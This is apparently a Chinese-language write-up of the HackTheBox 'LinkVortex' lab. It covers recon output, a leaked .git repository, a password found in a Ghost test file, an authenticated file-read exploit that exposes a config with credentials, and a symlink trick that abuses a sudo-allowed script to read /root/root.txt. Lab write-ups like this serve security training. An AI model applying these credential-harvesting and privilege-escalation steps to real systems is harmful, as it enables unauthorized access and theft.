nmap 結果
20/tcp closed ftp-data
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
把 linkvortex.htb
加入 /etc/hosts
dirsearch 的結果 (字典檔多換幾個)
[01:44:43] Starting:
[01:45:02] 200 - 1KB - /LICENSE
[01:45:23] 301 - 179B - /assets -> /assets/
[01:45:43] 404 - 7KB - /cgi-bin/
[01:46:19] 200 - 15KB - /favicon.ico
[01:47:29] 301 - 183B - /partials -> /partials/
[01:47:53] 200 - 103B - /robots.txt
[01:48:01] 403 - 199B - /server-status
[01:48:06] 200 - 258B - /sitemap.xml
訪問 /robots.txt
在 ghost 找到登入介面
User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/
掃 sundomain 找到 dev
加到 hosts 後訪問發現有 git 洩漏
因此應該是要在 .git 洩漏中找密碼 但裡頭東西超級多根本翻不完...
去 grep -rl "password" /path/
出來的東西也超級多 看了 writeup 後是在 這個 path ghost/core/test/regression/api/admin/authentication.test.js
const nock = require('nock');
const assert = require('assert/strict');
const {agentProvider, mockManager, fixtureManager, matchers} = require('../../../utils/e2e-framework');
const {anyContentVersion, anyEtag, anyISODateTime, anyErrorId} = matchers;
const {tokens} = require('@tryghost/security');
const models = require('../../../../core/server/models');
const settingsCache = require('../../../../core/shared/settings-cache');
async function waitForEmailSent(emailMockReceiver, number = 1) {
let sentEmailCount = 0;
while (sentEmailCount === 0) {
try {
sentEmailCount = number;
} catch (e) {
await new Promise((resolve) => {
setTimeout(resolve, 100);
describe('Authentication API', function () {
let emailMockReceiver;
let agent;
describe('Blog setup', function () {
before(async function () {
agent = await agentProvider.getAdminAPIAgent();
beforeEach(async function () {
await mockManager.disableStripe();
emailMockReceiver = mockManager.mockMail();
afterEach(function () {
it('is setup? no', async function () {
await agent
'content-version': anyContentVersion,
etag: anyEtag
it('complete setup', async function () {
const email = 'test@example.com';
const password = 'OctopiFociPilfer45';
const requestMock = nock('https://api.github.com')
.replyWithFile(200, fixtureManager.getPathForFixture('themes/valid.zip'));
await agent
setup: [{
name: 'test user',
blogTitle: 'a test blog',
theme: 'TryGhost/Dawn',
accentColor: '#85FF00',
description: 'Custom Site Description on Setup — great for everyone'
users: [{
created_at: anyISODateTime,
updated_at: anyISODateTime
'content-version': anyContentVersion,
etag: anyEtag
await waitForEmailSent(emailMockReceiver);
// Test our side effects
assert.equal(requestMock.isDone(), true, 'The dawn github URL should have been used');
const activeTheme = await settingsCache.get('active_theme');
const accentColor = await settingsCache.get('accent_color');
const description = await settingsCache.get('description');
assert.equal(activeTheme, 'dawn', 'The theme dawn should have been installed');
assert.equal(accentColor, '#85FF00', 'The accent color should have been set');
assert.equal(description, 'Custom Site Description on Setup — great for everyone', 'The site description should have been set');
// Test that we would not show any notifications (errors) to the user
await agent.loginAs(email, password);
await agent
.expect(({body}) => {
assert.deepEqual(body.notifications, [], 'The setup should not create notifications');
// Test that the default Tier has been renamed from 'Default Product'
const {body} = await agent.get('/tiers/');
const tierWithDefaultProductName = body.tiers.find(x => x.name === 'Default Product');
assert(tierWithDefaultProductName === undefined, 'The default Tier should have had a name change');
// Test that the default Newsletter has name and sender name changed to blog title
const {body: newsletterBody} = await agent.get('/newsletters/');
const defaultNewsletter = newsletterBody.newsletters.find(x => x.slug === 'default-newsletter');
const newsletterWithDefaultName = newsletterBody.newsletters.find(x => x.name
=== 'Default Newsletter');
assert (defaultNewsletter.name === 'a test blog', 'The default newsletter should have had a name change');
assert(newsletterWithDefaultName === undefined, 'The default newsletter should have had a name change');
it('is setup? yes', async function () {
await agent
'content-version': anyContentVersion,
etag: anyEtag
it('complete setup again', function () {
return agent
setup: [{
name: 'test user',
email: 'test-leo@example.com',
password: 'thisissupersafe',
blogTitle: 'a test blog'
errors: [{
id: anyErrorId
'content-version': anyContentVersion,
etag: anyEtag
it('update setup', async function () {
await fixtureManager.init();
await agent.loginAsOwner();
await agent
setup: [{
name: 'test user edit',
email: 'test-edit@example.com',
password: 'thisissupersafe',
blogTitle: 'a test blog'
users: [{
created_at: anyISODateTime,
last_seen: anyISODateTime,
updated_at: anyISODateTime
'content-version': anyContentVersion,
etag: anyEtag
it('complete setup with default theme', async function () {
const cleanAgent = await agentProvider.getAdminAPIAgent();
const email = 'test@example.com';
const password = 'thisissupersafe';
const requestMock = nock('https://api.github.com')
.replyWithFile(200, fixtureManager.getPathForFixture('themes/valid.zip'));
await cleanAgent
setup: [{
name: 'test user',
blogTitle: 'a test blog',
theme: 'TryGhost/Casper',
accentColor: '#85FF00',
description: 'Custom Site Description on Setup — great for everyone'
users: [{
created_at: anyISODateTime,
updated_at: anyISODateTime
'content-version': anyContentVersion,
etag: anyEtag
await waitForEmailSent(emailMockReceiver);
// Test our side effects
assert.equal(requestMock.isDone(), false, 'The ghost github URL should not have been used');
const activeTheme = await settingsCache.get('active_theme');
const accentColor = await settingsCache.get('accent_color');
const description = await settingsCache.get('description');
assert.equal(activeTheme, 'casper', 'The theme casper should have been installed');
assert.equal(accentColor, '#85FF00', 'The accent color should have been set');
assert.equal(description, 'Custom Site Description on Setup — great for everyone', 'The site description should have been set');
// Test that we would not show any notifications (errors) to the user
await cleanAgent.loginAs(email, password);
await cleanAgent
.expect(({body}) => {
assert.deepEqual(body.notifications, [], 'The setup should not create notifications');
describe('Invitation', function () {
before(async function () {
agent = await agentProvider.getAdminAPIAgent();
await fixtureManager.init('invites');
await agent.loginAsOwner();
it('check invite with invalid email', function () {
return agent
'content-version': anyContentVersion,
etag: anyEtag
it('check valid invite', async function () {
await agent
.get(`authentication/invitation?email=${fixtureManager.get('invites', 0).email}`)
'content-version': anyContentVersion,
etag: anyEtag
it('check invalid invite', async function () {
await agent
'content-version': anyContentVersion,
etag: anyEtag
it('try to accept without invite', function () {
return agent
invitation: [{
token: 'lul11111',
password: 'lel123456',
email: 'not-invited@example.org',
name: 'not invited'
'content-version': anyContentVersion,
etag: anyEtag
it('try to accept with invite and existing email address', function () {
return agent
invitation: [{
token: fixtureManager.get('invites', 0).token,
password: '12345678910',
email: fixtureManager.get('users', 0).email,
name: 'invited'
errors: [{
id: anyErrorId
'content-version': anyContentVersion,
etag: anyEtag
it('try to accept with invite', async function () {
await agent
invitation: [{
token: fixtureManager.get('invites', 0).token,
password: '12345678910',
email: fixtureManager.get('invites', 0).email,
name: 'invited'
'content-version': anyContentVersion,
etag: anyEtag
describe('Password reset', function () {
const email = fixtureManager.get('users', 0).email;
before(async function () {
agent = await agentProvider.getAdminAPIAgent();
await fixtureManager.init('invites');
await agent.loginAsOwner();
beforeEach(function () {
afterEach(function () {
it('reset password', async function () {
const ownerUser = await fixtureManager.getCurrentOwnerUser();
const token = tokens.resetToken.generateHash({
expires: Date.now() + (1000 * 60),
email: email,
dbHash: settingsCache.get('db_hash'),
password: ownerUser.get('password')
await agent.put('authentication/password_reset')
.header('Accept', 'application/json')
password_reset: [{
token: token,
newPassword: 'thisissupersafe',
ne2Password: 'thisissupersafe'
'content-version': anyContentVersion,
etag: anyEtag
it('reset password: invalid token', async function () {
await agent
.header('Accept', 'application/json')
password_reset: [{
token: 'invalid',
newPassword: 'thisissupersafe',
ne2Password: 'thisissupersafe'
errors: [{
id: anyErrorId
'content-version': anyContentVersion,
etag: anyEtag
it('reset password: expired token', async function () {
const ownerUser = await fixtureManager.getCurrentOwnerUser();
const dateInThePast = Date.now() - (1000 * 60);
const token = tokens.resetToken.generateHash({
expires: dateInThePast,
email: email,
dbHash: settingsCache.get('db_hash'),
password: ownerUser.get('password')
await agent
.header('Accept', 'application/json')
password_reset: [{
token: token,
newPassword: 'thisissupersafe',
ne2Password: 'thisissupersafe'
errors: [{
id: anyErrorId
'content-version': anyContentVersion,
etag: anyEtag
it('reset password: unmatched token', async function () {
const token = tokens.resetToken.generateHash({
expires: Date.now() + (1000 * 60),
email: email,
dbHash: settingsCache.get('db_hash'),
password: 'invalid_password'
await agent
.header('Accept', 'application/json')
password_reset: [{
token: token,
newPassword: 'thisissupersafe',
ne2Password: 'thisissupersafe'
errors: [{
id: anyErrorId
'content-version': anyContentVersion,
etag: anyEtag
it('reset password: generate reset token', async function () {
await agent
.header('Accept', 'application/json')
password_reset: [{
email: email
'content-version': anyContentVersion,
etag: anyEtag
describe('Reset all passwords', function () {
before(async function () {
agent = await agentProvider.getAdminAPIAgent();
await fixtureManager.init('invites');
await agent.loginAsOwner();
beforeEach(function () {
emailMockReceiver = mockManager.mockMail();
afterEach(function () {
it('reset all passwords returns 204', async function () {
await agent.post('authentication/global_password_reset')
.header('Accept', 'application/json')
'content-version': anyContentVersion,
etag: anyEtag
// Check side effects
// All users locked
const users = await models.User.fetchAll();
for (const user of users) {
assert.equal(user.get('status'), 'locked', `Status should be locked for user ${user.get('email')}`);
// No session left
const sessions = await models.Session.fetchAll();
assert.equal(sessions.length, 0, 'There should be no sessions left in the DB');
subject: 'Reset Password',
to: 'jbloggs@example.com'
subject: 'Reset Password',
to: 'ghost-author@example.com'
然後有密碼 是 OctopiFociPilfer45
搭配 admin@linkvortex.htb
去登入 (根本找不到)
登入後由於在 .git 中有發現 ghost 版本為 5.58.0 。然後是要登入的 RCE 所以拿來用看看
把文件的 url 改一改後就可以登入了 進去後可以讀取資料 有成功讀取到 /etc/passwd
在 .git 洩漏中有 docker 文件 裡頭有個路徑 ![image](https://hackmd.io/_uploads/Hkatl1hSkl.png)
讀取後會得到 一組帳密 bob@linkvortex.htb
file> /var/lib/ghost/config.production.json
"url": "http://localhost:2368",
"server": {
"port": 2368,
"host": "::"
"mail": {
"transport": "Direct"
"logging": {
"transports": ["stdout"]
"process": "systemd",
"paths": {
"contentPath": "/var/lib/ghost/content"
"spam": {
"user_login": {
"minWait": 1,
"maxWait": 604800000,
"freeRetries": 5000
"mail": {
"transport": "SMTP",
"options": {
"service": "Google",
"host": "linkvortex.htb",
"port": 587,
"auth": {
"user": "bob@linkvortex.htb",
"pass": "fibber-talented-worth"
sudo -l 發現有這個可以利用
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
看一下這個腳本在做什麼 檢查 CHECK_CONTENT 變數: 如果未設定 CHECK_CONTENT,則將其設為 false(這決定是否顯示文件內容)。
檢查輸入的文件是否是 .png 檔案: 如果傳入的第一個參數不是 .png 檔案,腳本會顯示錯誤訊息並退出。
檢查是否是符號鏈接: 如果指定的檔案是符號鏈接,腳本會進一步處理。
檢查符號鏈接的目標: 如果符號鏈接指向的是系統敏感的檔案(如 /etc 或 /root 目錄中的檔案),腳本會移除這個符號鏈接。
顯示內容(如果需要): 如果 CHECK_CONTENT 被設為 true,腳本會顯示隔離區中被移動的檔案內容。
if [ -z $CHECK_CONTENT ];then
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
因此我們可以透過建立軟連結的方式讀取到 flag 因為知道 flag 叫 /root/root.txt
同時因為知道他會偵測是否為敏感字 因此作兩次軟連結 並把 CHECK_CONTENT 設為 true
bob@linkvortex:~$ ln -s /root/root.txt 123.txt
bob@linkvortex:~$ ln -s /home/bob/123.txt 123.png
bob@linkvortex:~$ sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/123.png